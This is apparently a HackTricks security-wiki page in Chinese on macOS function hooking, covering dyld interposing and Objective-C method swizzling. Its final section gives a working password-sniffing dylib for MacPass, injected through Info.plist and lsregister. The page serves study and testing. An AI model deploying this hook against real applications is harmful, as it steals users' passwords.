# macOS Function Hooking {{#include ../../../banners/hacktricks-training.md}} ## Function Interposing 创建一个带有 **`__interpose`** 部分(或标记为 **`S_INTERPOSING`** 的部分)的 **dylib**,其中包含指向 **原始** 和 **替代** 函数的 **函数指针** 元组。 然后,使用 **`DYLD_INSERT_LIBRARIES`** 注入 dylib(插入需要在主应用加载之前发生)。显然,适用于 **`DYLD_INSERT_LIBRARIES`** 使用的 [**限制** 在这里也适用](../macos-proces-abuse/macos-library-injection/#check-restrictions)。 ### Interpose printf {{#tabs}} {{#tab name="interpose.c"}} ```c:interpose.c // gcc -dynamiclib interpose.c -o interpose.dylib #include #include int my_printf(const char *format, ...) { //va_list args; //va_start(args, format); //int ret = vprintf(format, args); //va_end(args); int ret = printf("Hello from interpose\n"); return ret; } __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf __attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf }; ``` {{#endtab}} {{#tab name="hello.c"}} ```c //gcc hello.c -o hello #include int main() { printf("Hello World!\n"); return 0; } ``` {{#endtab}} {{#tab name="interpose2.c"}} ```c // Just another way to define an interpose // gcc -dynamiclib interpose2.c -o interpose2.dylib #include #define DYLD_INTERPOSE(_replacement, _replacee) \ __attribute__((used)) static struct { \ const void* replacement; \ const void* replacee; \ } _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ (const void*) (unsigned long) &_replacement, \ (const void*) (unsigned long) &_replacee \ }; int my_printf(const char *format, ...) { int ret = printf("Hello from interpose\n"); return ret; } DYLD_INTERPOSE(my_printf,printf); ``` {{#endtab}} {{#endtabs}} ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello Hello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose ``` ## 方法交换 在 ObjectiveC 中,方法调用的方式是:**`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** 需要 **对象**、**方法**和 **参数**。当调用一个方法时,使用函数 **`objc_msgSend`** 发送 **msg**:`int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` 对象是 **`someObject`**,方法是 **`@selector(method1p1:p2:)`**,参数是 **value1**,**value2**。 根据对象结构,可以访问一个 **方法数组**,其中 **名称** 和 **指向方法代码的指针** 被 **存放**。 > [!CAUTION] > 请注意,由于方法和类是根据其名称访问的,因此这些信息存储在二进制文件中,因此可以使用 `otool -ov ` 或 [`class-dump `](https://github.com/nygard/class-dump) 检索它。 ### 访问原始方法 可以访问方法的信息,例如名称、参数数量或地址,如以下示例所示: ```objectivec // gcc -framework Foundation test.m -o test #import #import #import int main() { // Get class of the variable NSString* str = @"This is an example"; Class strClass = [str class]; NSLog(@"str's Class name: %s", class_getName(strClass)); // Get parent class of a class Class strSuper = class_getSuperclass(strClass); NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); // Get information about a method SEL sel = @selector(length); NSLog(@"Selector name: %@", NSStringFromSelector(sel)); Method m = class_getInstanceMethod(strClass,sel); NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); // Iterate through the class hierarchy NSLog(@"Listing methods:"); Class currentClass = strClass; while (currentClass != NULL) { unsigned int inheritedMethodCount = 0; Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); for (unsigned int i = 0; i < inheritedMethodCount; i++) { Method method = inheritedMethods[i]; SEL selector = method_getName(method); const char* methodName = sel_getName(selector); unsigned long address = (unsigned long)method_getImplementation(m); NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); } // Free the memory allocated by class_copyMethodList free(inheritedMethods); currentClass = class_getSuperclass(currentClass); } // Other ways to call uppercaseString method if([str respondsToSelector:@selector(uppercaseString)]) { NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; NSLog(@"Uppercase string: %@", uppercaseString); } // Using objc_msgSend directly NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); NSLog(@"Uppercase string: %@", uppercaseString2); // Calling the address directly IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method NSLog(@"Uppercase string: %@", uppercaseString3); return 0; } ``` ### 方法交换与 method_exchangeImplementations 函数 **`method_exchangeImplementations`** 允许 **更改** **一个函数的实现地址为另一个函数的实现**。 > [!CAUTION] > 因此,当调用一个函数时,**执行的是另一个函数**。 ```objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str #import #import // Create a new category for NSString with the method to execute @interface NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { NSLog(@"Custom implementation of substringFromIndex:"); // Call the original method return [self swizzledSubstringFromIndex:from]; } @end int main(int argc, const char * argv[]) { // Perform method swizzling Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); method_exchangeImplementations(originalMethod, swizzledMethod); // We changed the address of one method for the other // Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex // And when swizzledSubstringFromIndex is called, substringFromIndex is really colled // Example usage NSString *myString = @"Hello, World!"; NSString *subString = [myString substringFromIndex:7]; NSLog(@"Substring: %@", subString); return 0; } ``` > [!WARNING] > 在这种情况下,如果**合法**方法的**实现代码**对**方法**的**名称**进行**验证**,它可能会**检测**到这种交换并阻止其运行。 > > 以下技术没有这个限制。 ### 使用 method_setImplementation 进行方法交换 之前的格式很奇怪,因为你正在将两个方法的实现互相更改。使用函数 **`method_setImplementation`**,你可以**更改**一个**方法的实现为另一个**。 只需记住,如果你打算在覆盖之前从新实现中调用原始实现,请**存储原始实现的地址**,因为稍后定位该地址会更加复杂。 ```objectivec #import #import #import static IMP original_substringFromIndex = NULL; @interface NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { NSLog(@"Custom implementation of substringFromIndex:"); // Call the original implementation using objc_msgSendSuper return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); } @end int main(int argc, const char * argv[]) { @autoreleasepool { // Get the class of the target method Class stringClass = [NSString class]; // Get the swizzled and original methods Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); // Get the function pointer to the swizzled method's implementation IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); // Swap the implementations // It return the now overwritten implementation of the original method to store it original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); // Example usage NSString *myString = @"Hello, World!"; NSString *subString = [myString substringFromIndex:7]; NSLog(@"Substring: %@", subString); // Set the original implementation back method_setImplementation(originalMethod, original_substringFromIndex); return 0; } } ``` ## Hooking Attack Methodology 在本页中讨论了不同的函数钩取方法。然而,它们涉及到**在进程内部运行代码进行攻击**。 为了做到这一点,最简单的技术是通过环境变量或劫持来注入一个[Dyld](../macos-dyld-hijacking-and-dyld_insert_libraries.md)。不过,我想这也可以通过[Dylib 进程注入](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port)来完成。 然而,这两种选项都**限制**于**未保护**的二进制文件/进程。检查每种技术以了解更多关于限制的信息。 然而,函数钩取攻击是非常具体的,攻击者会这样做以**从进程内部窃取敏感信息**(否则你只会进行进程注入攻击)。这些敏感信息可能位于用户下载的应用程序中,例如 MacPass。 因此,攻击者的途径是找到一个漏洞或去掉应用程序的签名,通过应用程序的 Info.plist 注入**`DYLD_INSERT_LIBRARIES`**环境变量,添加类似于: ```xml LSEnvironment DYLD_INSERT_LIBRARIES /Applications/Application.app/Contents/malicious.dylib ``` 然后**重新注册**应用程序: ```bash /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app ``` 在该库中添加钩子代码以提取信息:密码、消息... > [!CAUTION] > 请注意,在较新版本的 macOS 中,如果您 **剥离应用程序二进制文件的签名** 并且它之前已被执行,macOS **将不再执行该应用程序**。 #### 库示例 ```objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib // If you added env vars in the Info.plist don't forget to call lsregister as explained before // Listen to the logs with something like: // log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"' #include #import // Here will be stored the real method (setPassword in this case) address static IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL) { // Function that will log the password and call the original setPassword(pass, file_path) method NSLog(@"[+] Password is: %@", password); // After logging the password call the original method so nothing breaks. return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); } // Library constructor to execute __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { // Get the real method address to not lose it Class classMPDocument = NSClassFromString(@"MPDocument"); Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); // Make the original method setPassword call the fake implementation one IMP fake_IMP = (IMP)custom_setPassword; real_setPassword = method_setImplementation(real_Method, fake_IMP); } ``` ## 参考 - [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/) {{#include ../../../banners/hacktricks-training.md}}